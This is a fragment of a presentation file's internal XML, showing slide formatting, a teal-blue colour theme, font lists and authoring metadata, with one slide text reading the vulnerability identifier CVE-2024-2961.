                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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  <a:lvl2pPr marL="55753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900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48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95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43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90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380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855" indent="-186055" algn="l" defTabSz="742950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/>
              <a:t>CVE-2024-2961</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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RiOTQzZmU2MzNhMmVmYzI5NDQ4YTk0NTBiZDAzNmEifQ=="/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="青蓝色深色模板">
  <a:themeElements>
    <a:clrScheme name="青蓝色-微渐变">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="222A35"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="DBEFF9"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0ED0A9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="45C4DA"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="21CFBA"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FFFFFF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="7F7F7F"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="F49100"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="85DFD0"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="自定义 1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 algn="l">
          <a:defRPr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2855</Words>
  <Application>WPS 演示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OPPOSans L</vt:lpstr>
      <vt:lpstr>优设标题黑</vt:lpstr>
      <vt:lpstr>OPPOSans H</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>华文宋体</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>OPPOSans R</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>青蓝色深色模板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Kwok Siu Cheng</dc:creator>
  <cp:lastModifiedBy>Insomnia.</cp:lastModifiedBy>
  <cp:revision>89</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-06T09:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-11T08:02:15Z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28F27B3B539C463784D107D655EDA596</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.21541</vt:lpwstr>
  </property>
</Properties>
</file>